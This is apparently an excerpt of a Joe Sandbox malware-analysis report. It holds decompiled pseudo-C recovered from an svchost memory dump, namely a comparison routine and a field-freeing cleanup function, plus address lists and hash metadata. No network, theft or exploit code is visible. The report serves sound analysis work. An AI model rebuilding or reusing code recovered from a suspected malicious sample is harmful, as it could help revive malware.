                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											if(_v8 == 0) {
                                                                                                                                                                                                                                                                            												goto L74;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_v8 = _v28;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if(0 != 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L76:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L76;
                                                                                                                                                                                                                                                                            			}
















































                                                                                                                                                                                                                                                                            0x04013f50
                                                                                                                                                                                                                                                                            0x04013f50
                                                                                                                                                                                                                                                                            0x04013f50
                                                                                                                                                                                                                                                                            0x04013f59
                                                                                                                                                                                                                                                                            0x04013f5c
                                                                                                                                                                                                                                                                            0x04013f63
                                                                                                                                                                                                                                                                            0x04013f86
                                                                                                                                                                                                                                                                            0x04013f99
                                                                                                                                                                                                                                                                            0x04013fa4
                                                                                                                                                                                                                                                                            0x04013faf
                                                                                                                                                                                                                                                                            0x04013faf
                                                                                                                                                                                                                                                                            0x04013fb7
                                                                                                                                                                                                                                                                            0x04013fc0
                                                                                                                                                                                                                                                                            0x04013fc6
                                                                                                                                                                                                                                                                            0x04013fd4
                                                                                                                                                                                                                                                                            0x04013fe0
                                                                                                                                                                                                                                                                            0x04013ff2
                                                                                                                                                                                                                                                                            0x04013ff7
                                                                                                                                                                                                                                                                            0x04013ffc
                                                                                                                                                                                                                                                                            0x04014011
                                                                                                                                                                                                                                                                            0x04014016
                                                                                                                                                                                                                                                                            0x0401401b
                                                                                                                                                                                                                                                                            0x0401443e
                                                                                                                                                                                                                                                                            0x04013fd1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04014021
                                                                                                                                                                                                                                                                            0x04014027
                                                                                                                                                                                                                                                                            0x04014029
                                                                                                                                                                                                                                                                            0x0401403b
                                                                                                                                                                                                                                                                            0x0401404c
                                                                                                                                                                                                                                                                            0x04014051
                                                                                                                                                                                                                                                                            0x04014054
                                                                                                                                                                                                                                                                            0x0401405a
                                                                                                                                                                                                                                                                            0x04014065
                                                                                                                                                                                                                                                                            0x0401406c
                                                                                                                                                                                                                                                                            0x04014070
                                                                                                                                                                                                                                                                            0x04014079
                                                                                                                                                                                                                                                                            0x04014038
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401407b
                                                                                                                                                                                                                                                                            0x0401407b
                                                                                                                                                                                                                                                                            0x0401407b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04014079
                                                                                                                                                                                                                                                                            0x0401403b
                                                                                                                                                                                                                                                                            0x04014083
                                                                                                                                                                                                                                                                            0x0401408a
                                                                                                                                                                                                                                                                            0x040140ac
                                                                                                                                                                                                                                                                            0x040140b1
                                                                                                                                                                                                                                                                            0x040140b9
                                                                                                                                                                                                                                                                            0x040140be
                                                                                                                                                                                                                                                                            0x040140be
                                                                                                                                                                                                                                                                            0x040140c1
                                                                                                                                                                                                                                                                            0x040140ce
                                                                                                                                                                                                                                                                            0x040140ef
                                                                                                                                                                                                                                                                            0x040140ef
                                                                                                                                                                                                                                                                            0x040140f6
                                                                                                                                                                                                                                                                            0x0401410e
                                                                                                                                                                                                                                                                            0x0401411c
                                                                                                                                                                                                                                                                            0x04014136
                                                                                                                                                                                                                                                                            0x0401413b
                                                                                                                                                                                                                                                                            0x04014140
                                                                                                                                                                                                                                                                            0x04014429
                                                                                                                                                                                                                                                                            0x0401442d
                                                                                                                                                                                                                                                                            0x04014119
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401442f
                                                                                                                                                                                                                                                                            0x04014146
                                                                                                                                                                                                                                                                            0x0401414c
                                                                                                                                                                                                                                                                            0x04014162
                                                                                                                                                                                                                                                                            0x04014166
                                                                                                                                                                                                                                                                            0x04014174
                                                                                                                                                                                                                                                                            0x04014187
                                                                                                                                                                                                                                                                            0x0401418e
                                                                                                                                                                                                                                                                            0x04014385
                                                                                                                                                                                                                                                                            0x0401438a
                                                                                                                                                                                                                                                                            0x0401438d
                                                                                                                                                                                                                                                                            0x04014394
                                                                                                                                                                                                                                                                            0x040143a3
                                                                                                                                                                                                                                                                            0x04014396
                                                                                                                                                                                                                                                                            0x0401439e
                                                                                                                                                                                                                                                                            0x0401439e
                                                                                                                                                                                                                                                                            0x040143ad
                                                                                                                                                                                                                                                                            0x040143d0
                                                                                                                                                                                                                                                                            0x040143e2
                                                                                                                                                                                                                                                                            0x040143f2
                                                                                                                                                                                                                                                                            0x040143f7
                                                                                                                                                                                                                                                                            0x040143fd
                                                                                                                                                                                                                                                                            0x04014404
                                                                                                                                                                                                                                                                            0x04014418
                                                                                                                                                                                                                                                                            0x04014406
                                                                                                                                                                                                                                                                            0x04014410
                                                                                                                                                                                                                                                                            0x04014410
                                                                                                                                                                                                                                                                            0x04014422
                                                                                                                                                                                                                                                                            0x04014422
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040143e4
                                                                                                                                                                                                                                                                            0x040143e7
                                                                                                                                                                                                                                                                            0x040143e7
                                                                                                                                                                                                                                                                            0x04014194
                                                                                                                                                                                                                                                                            0x040141a7
                                                                                                                                                                                                                                                                            0x040141b0
                                                                                                                                                                                                                                                                            0x040141c2
                                                                                                                                                                                                                                                                            0x040141c8
                                                                                                                                                                                                                                                                            0x040141cb
                                                                                                                                                                                                                                                                            0x040141d6
                                                                                                                                                                                                                                                                            0x040141e1
                                                                                                                                                                                                                                                                            0x040141f4
                                                                                                                                                                                                                                                                            0x040141fc
                                                                                                                                                                                                                                                                            0x0401420e
                                                                                                                                                                                                                                                                            0x04014213
                                                                                                                                                                                                                                                                            0x0401421c
                                                                                                                                                                                                                                                                            0x04014225
                                                                                                                                                                                                                                                                            0x04014233
                                                                                                                                                                                                                                                                            0x04014251
                                                                                                                                                                                                                                                                            0x04014256
                                                                                                                                                                                                                                                                            0x0401425b
                                                                                                                                                                                                                                                                            0x0401435a
                                                                                                                                                                                                                                                                            0x04014230
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04014261
                                                                                                                                                                                                                                                                            0x0401426a
                                                                                                                                                                                                                                                                            0x04014296
                                                                                                                                                                                                                                                                            0x0401429d
                                                                                                                                                                                                                                                                            0x040142b1
                                                                                                                                                                                                                                                                            0x040142b6
                                                                                                                                                                                                                                                                            0x040142b9
                                                                                                                                                                                                                                                                            0x040142c0
                                                                                                                                                                                                                                                                            0x040142cf
                                                                                                                                                                                                                                                                            0x040142c2
                                                                                                                                                                                                                                                                            0x040142ca
                                                                                                                                                                                                                                                                            0x040142ca
                                                                                                                                                                                                                                                                            0x040142d9
                                                                                                                                                                                                                                                                            0x040142fc
                                                                                                                                                                                                                                                                            0x04014319
                                                                                                                                                                                                                                                                            0x04014329
                                                                                                                                                                                                                                                                            0x0401432e
                                                                                                                                                                                                                                                                            0x04014334
                                                                                                                                                                                                                                                                            0x0401433b
                                                                                                                                                                                                                                                                            0x0401434c
                                                                                                                                                                                                                                                                            0x0401433d
                                                                                                                                                                                                                                                                            0x04014347
                                                                                                                                                                                                                                                                            0x04014347
                                                                                                                                                                                                                                                                            0x04014353
                                                                                                                                                                                                                                                                            0x04014353
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401431b
                                                                                                                                                                                                                                                                            0x0401431e
                                                                                                                                                                                                                                                                            0x0401431e
                                                                                                                                                                                                                                                                            0x0401429f
                                                                                                                                                                                                                                                                            0x040142a2
                                                                                                                                                                                                                                                                            0x040142a2
                                                                                                                                                                                                                                                                            0x0401429d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401425b
                                                                                                                                                                                                                                                                            0x04014363
                                                                                                                                                                                                                                                                            0x04014368
                                                                                                                                                                                                                                                                            0x0401436f
                                                                                                                                                                                                                                                                            0x04014374
                                                                                                                                                                                                                                                                            0x04014377
                                                                                                                                                                                                                                                                            0x04014377
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401437e
                                                                                                                                                                                                                                                                            0x0401414e
                                                                                                                                                                                                                                                                            0x04014154
                                                                                                                                                                                                                                                                            0x04014154
                                                                                                                                                                                                                                                                            0x0401414c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04014140
                                                                                                                                                                                                                                                                            0x0401443a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401443c
                                                                                                                                                                                                                                                                            0x040140f8
                                                                                                                                                                                                                                                                            0x040140fb
                                                                                                                                                                                                                                                                            0x040140fb
                                                                                                                                                                                                                                                                            0x040140f6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013ffe
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013ffc
                                                                                                                                                                                                                                                                            0x04014445
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013f9b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013f88
                                                                                                                                                                                                                                                                            0x0401444b
                                                                                                                                                                                                                                                                            0x04014451
                                                                                                                                                                                                                                                                            0x04014451
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                                            • Instruction ID: 1232f30742209602bb969d2521b285a9e46184637cee8bf4b984800216b21bdb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF125B0E04219DFDB14DFA8D894BEEBBB1BF48308F148119E415BB2A5D774AA41CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E04023C90(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                                                                                                                            				intOrPtr _v128;
                                                                                                                                                                                                                                                                            				intOrPtr _t210;
                                                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                                                            				void* _t324;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v100 = __ecx;
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v100 + 0x58)) != 0) {
                                                                                                                                                                                                                                                                            					_v28 =  *((intOrPtr*)(_v100 + 0x58));
                                                                                                                                                                                                                                                                            					_v24 = _v28;
                                                                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                                                                            						_v104 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v104 = E040050D0(_v24, 1);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v100 + 0x58)) = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v100 + 4)) != 0) {
                                                                                                                                                                                                                                                                            					_v32 =  *((intOrPtr*)(_v100 + 4));
                                                                                                                                                                                                                                                                            					E04020CC0(_v32);
                                                                                                                                                                                                                                                                            					_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v100 + 4)) = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v100 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                            					_v40 =  *((intOrPtr*)(_v100 + 0x14));
                                                                                                                                                                                                                                                                            					_v36 = _v40;
                                                                                                                                                                                                                                                                            					if(_v36 == 0) {
                                                                                                                                                                                                                                                                            						_v108 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v108 = E04005100(_v36, 1);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v100 + 0x14)) = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t210 = _v100;
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t210 + 0x18)) != 0) {
                                                                                                                                                                                                                                                                            					_v48 =  *((intOrPtr*)(_v100 + 0x18));
                                                                                                                                                                                                                                                                            					_t210 = _v48;
                                                                                                                                                                                                                                                                            					_v44 = _t210;
                                                                                                                                                                                                                                                                            					if(_v44 == 0) {
                                                                                                                                                                                                                                                                            						_v112 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t210 = E04005130(_v44, 1);
                                                                                                                                                                                                                                                                            						_v112 = _t210;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v100 + 0x18)) = 0x666;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v100 + 0x20)) > 0) {
                                                                                                                                                                                                                                                                            					_t210 = _v100;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                                                            						while(_v8 <  *((intOrPtr*)(_v100 + 0x20))) {
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) != 0) {
                                                                                                                                                                                                                                                                            								_v56 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4));
                                                                                                                                                                                                                                                                            								_v52 = _v56;
                                                                                                                                                                                                                                                                            								if(_v52 == 0) {
                                                                                                                                                                                                                                                                            									_v116 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v116 = E04005160(_v52, 1);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t210 = _v100;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                            							_v60 =  *((intOrPtr*)(_v100 + 0x1c));
                                                                                                                                                                                                                                                                            							_t210 = E04020CC0(_v60);
                                                                                                                                                                                                                                                                            							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v100 + 0x1c)) = 0x666;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v100 + 0x2c)) > 0) {
                                                                                                                                                                                                                                                                            					_t210 = _v100;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                                                                            						while(_v12 <  *((intOrPtr*)(_v100 + 0x2c))) {
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) != 0) {
                                                                                                                                                                                                                                                                            								_v68 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4));
                                                                                                                                                                                                                                                                            								_v64 = _v68;
                                                                                                                                                                                                                                                                            								if(_v64 == 0) {
                                                                                                                                                                                                                                                                            									_v120 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v120 = E04005190(_v64, 1);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t210 = _v100;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                                            							_v72 =  *((intOrPtr*)(_v100 + 0x28));
                                                                                                                                                                                                                                                                            							_t210 = E04020CC0(_v72);
                                                                                                                                                                                                                                                                            							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v100 + 0x28)) = 0x666;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v100 + 0x38)) > 0) {
                                                                                                                                                                                                                                                                            					_t210 = _v100;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                                            						while(_v16 <  *((intOrPtr*)(_v100 + 0x38))) {
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) != 0) {
                                                                                                                                                                                                                                                                            								_v80 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4));
                                                                                                                                                                                                                                                                            								_v76 = _v80;
                                                                                                                                                                                                                                                                            								if(_v76 == 0) {
                                                                                                                                                                                                                                                                            									_v124 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v124 = E040051C0(_v76, 1);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t210 = _v100;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                                            							_v84 =  *((intOrPtr*)(_v100 + 0x34));
                                                                                                                                                                                                                                                                            							_t210 = E04020CC0(_v84);
                                                                                                                                                                                                                                                                            							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v100 + 0x34)) = 0x666;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v100 + 0x44)) > 0) {
                                                                                                                                                                                                                                                                            					_t210 = _v100;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						while(_v20 <  *((intOrPtr*)(_v100 + 0x44))) {
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) != 0) {
                                                                                                                                                                                                                                                                            								_v92 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4));
                                                                                                                                                                                                                                                                            								_v88 = _v92;
                                                                                                                                                                                                                                                                            								if(_v88 == 0) {
                                                                                                                                                                                                                                                                            									_v128 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v128 = E040051F0(_v88, 1);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t210 = _v100;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                                            							_v96 =  *((intOrPtr*)(_v100 + 0x40));
                                                                                                                                                                                                                                                                            							_t213 = E04020CC0(_v96);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v100 + 0x40)) = 0x666;
                                                                                                                                                                                                                                                                            							return _t213;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t210;
                                                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                                                            0x04023c96
                                                                                                                                                                                                                                                                            0x04023ca0
                                                                                                                                                                                                                                                                            0x04023ca8
                                                                                                                                                                                                                                                                            0x04023cae
                                                                                                                                                                                                                                                                            0x04023cb5
                                                                                                                                                                                                                                                                            0x04023cc6
                                                                                                                                                                                                                                                                            0x04023cb7
                                                                                                                                                                                                                                                                            0x04023cc1
                                                                                                                                                                                                                                                                            0x04023cc1
                                                                                                                                                                                                                                                                            0x04023cd0
                                                                                                                                                                                                                                                                            0x04023cd0
                                                                                                                                                                                                                                                                            0x04023cde
                                                                                                                                                                                                                                                                            0x04023ce6
                                                                                                                                                                                                                                                                            0x04023ced
                                                                                                                                                                                                                                                                            0x04023cf2
                                                                                                                                                                                                                                                                            0x04023cf8
                                                                                                                                                                                                                                                                            0x04023cf8
                                                                                                                                                                                                                                                                            0x04023d06
                                                                                                                                                                                                                                                                            0x04023d0e
                                                                                                                                                                                                                                                                            0x04023d14
                                                                                                                                                                                                                                                                            0x04023d1b
                                                                                                                                                                                                                                                                            0x04023d2c
                                                                                                                                                                                                                                                                            0x04023d1d
                                                                                                                                                                                                                                                                            0x04023d27
                                                                                                                                                                                                                                                                            0x04023d27
                                                                                                                                                                                                                                                                            0x04023d36
                                                                                                                                                                                                                                                                            0x04023d36
                                                                                                                                                                                                                                                                            0x04023d3d
                                                                                                                                                                                                                                                                            0x04023d44
                                                                                                                                                                                                                                                                            0x04023d4c
                                                                                                                                                                                                                                                                            0x04023d4f
                                                                                                                                                                                                                                                                            0x04023d52
                                                                                                                                                                                                                                                                            0x04023d59
                                                                                                                                                                                                                                                                            0x04023d6a
                                                                                                                                                                                                                                                                            0x04023d5b
                                                                                                                                                                                                                                                                            0x04023d60
                                                                                                                                                                                                                                                                            0x04023d65
                                                                                                                                                                                                                                                                            0x04023d65
                                                                                                                                                                                                                                                                            0x04023d74
                                                                                                                                                                                                                                                                            0x04023d74
                                                                                                                                                                                                                                                                            0x04023d82
                                                                                                                                                                                                                                                                            0x04023d88
                                                                                                                                                                                                                                                                            0x04023d8f
                                                                                                                                                                                                                                                                            0x04023d95
                                                                                                                                                                                                                                                                            0x04023da7
                                                                                                                                                                                                                                                                            0x04023dbf
                                                                                                                                                                                                                                                                            0x04023dcd
                                                                                                                                                                                                                                                                            0x04023dd3
                                                                                                                                                                                                                                                                            0x04023dda
                                                                                                                                                                                                                                                                            0x04023deb
                                                                                                                                                                                                                                                                            0x04023ddc
                                                                                                                                                                                                                                                                            0x04023de6
                                                                                                                                                                                                                                                                            0x04023de6
                                                                                                                                                                                                                                                                            0x04023dfb
                                                                                                                                                                                                                                                                            0x04023dfb
                                                                                                                                                                                                                                                                            0x04023da4
                                                                                                                                                                                                                                                                            0x04023da4
                                                                                                                                                                                                                                                                            0x04023e04
                                                                                                                                                                                                                                                                            0x04023e0b
                                                                                                                                                                                                                                                                            0x04023e13
                                                                                                                                                                                                                                                                            0x04023e1a
                                                                                                                                                                                                                                                                            0x04023e1f
                                                                                                                                                                                                                                                                            0x04023e25
                                                                                                                                                                                                                                                                            0x04023e25
                                                                                                                                                                                                                                                                            0x04023e0b
                                                                                                                                                                                                                                                                            0x04023d8f
                                                                                                                                                                                                                                                                            0x04023e33
                                                                                                                                                                                                                                                                            0x04023e39
                                                                                                                                                                                                                                                                            0x04023e40
                                                                                                                                                                                                                                                                            0x04023e46
                                                                                                                                                                                                                                                                            0x04023e58
                                                                                                                                                                                                                                                                            0x04023e70
                                                                                                                                                                                                                                                                            0x04023e7e
                                                                                                                                                                                                                                                                            0x04023e84
                                                                                                                                                                                                                                                                            0x04023e8b
                                                                                                                                                                                                                                                                            0x04023e9c
                                                                                                                                                                                                                                                                            0x04023e8d
                                                                                                                                                                                                                                                                            0x04023e97
                                                                                                                                                                                                                                                                            0x04023e97
                                                                                                                                                                                                                                                                            0x04023eac
                                                                                                                                                                                                                                                                            0x04023eac
                                                                                                                                                                                                                                                                            0x04023e55
                                                                                                                                                                                                                                                                            0x04023e55
                                                                                                                                                                                                                                                                            0x04023eb5
                                                                                                                                                                                                                                                                            0x04023ebc
                                                                                                                                                                                                                                                                            0x04023ec4
                                                                                                                                                                                                                                                                            0x04023ecb
                                                                                                                                                                                                                                                                            0x04023ed0
                                                                                                                                                                                                                                                                            0x04023ed6
                                                                                                                                                                                                                                                                            0x04023ed6
                                                                                                                                                                                                                                                                            0x04023ebc
                                                                                                                                                                                                                                                                            0x04023e40
                                                                                                                                                                                                                                                                            0x04023ee4
                                                                                                                                                                                                                                                                            0x04023eea
                                                                                                                                                                                                                                                                            0x04023ef1
                                                                                                                                                                                                                                                                            0x04023ef7
                                                                                                                                                                                                                                                                            0x04023f09
                                                                                                                                                                                                                                                                            0x04023f21
                                                                                                                                                                                                                                                                            0x04023f2f
                                                                                                                                                                                                                                                                            0x04023f35
                                                                                                                                                                                                                                                                            0x04023f3c
                                                                                                                                                                                                                                                                            0x04023f4d
                                                                                                                                                                                                                                                                            0x04023f3e
                                                                                                                                                                                                                                                                            0x04023f48
                                                                                                                                                                                                                                                                            0x04023f48
                                                                                                                                                                                                                                                                            0x04023f5d
                                                                                                                                                                                                                                                                            0x04023f5d
                                                                                                                                                                                                                                                                            0x04023f06
                                                                                                                                                                                                                                                                            0x04023f06
                                                                                                                                                                                                                                                                            0x04023f66
                                                                                                                                                                                                                                                                            0x04023f6d
                                                                                                                                                                                                                                                                            0x04023f75
                                                                                                                                                                                                                                                                            0x04023f7c
                                                                                                                                                                                                                                                                            0x04023f81
                                                                                                                                                                                                                                                                            0x04023f87
                                                                                                                                                                                                                                                                            0x04023f87
                                                                                                                                                                                                                                                                            0x04023f6d
                                                                                                                                                                                                                                                                            0x04023ef1
                                                                                                                                                                                                                                                                            0x04023f95
                                                                                                                                                                                                                                                                            0x04023f9b
